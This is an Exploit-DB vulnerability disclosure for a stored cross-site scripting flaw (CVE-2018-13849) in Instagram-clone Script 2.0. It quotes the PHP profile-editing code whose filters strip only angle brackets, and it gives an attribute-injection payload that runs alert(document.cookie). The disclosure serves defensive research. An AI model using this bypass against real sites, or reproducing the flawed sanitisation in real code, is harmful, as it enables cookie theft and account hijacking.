Instagram-Clone Script 2.0 - Cross-Site Scripting

EDB-ID:

45003


Author:

L0RD

Type:

webapps


Platform:

PHP

Date:

2018-07-11


# Exploit Title: Instagram-clone Script 2.0 - Cross-Site Scripting
# Date: 2018-07-10
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/yTakkar/Instagram-clone
# Version: 2.0
# CVE: CVE-2018-13849
# Tested on: Kali linux

# POC : Persistent Cross site scripting :
# vulnerable file : edit_requests.php
# vulnerable code :

if (isset($_POST['username'])) {
      $username = preg_replace("#[<> ]#i", "", $_POST['username']);
      $firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']);
      $surname = preg_replace("#[<> ]#i", "", $_POST['surname']);
      $bio = preg_replace("#[<>]#i", "", $_POST['bio']);
      $instagram = preg_replace("#[<>]#i", "", $_POST['instagram']);
      $youtube = preg_replace("#[<>]#i", "", $_POST['youtube']);
      $facebook = preg_replace("#[<>]#i", "", $_POST['facebook']);
      $twitter = preg_replace("#[<>]#i", "", $_POST['twitter']);
      $website = preg_replace("#[<>]#i", "", $_POST['website']);
      $mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']);
      $tags = preg_replace("#[\s]#", "-", $_POST['tags']);
 $session = $_SESSION['id'];

      $m=$edit->saveProfileEditing($username, $firstname, $surname, $bio,
$instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags);
      $array = array("mssg" => $m);
      echo json_encode($array);
    }

# We use this payload to bypass filter :
# Payload : 

"onmouseover=" alert(document.cookie)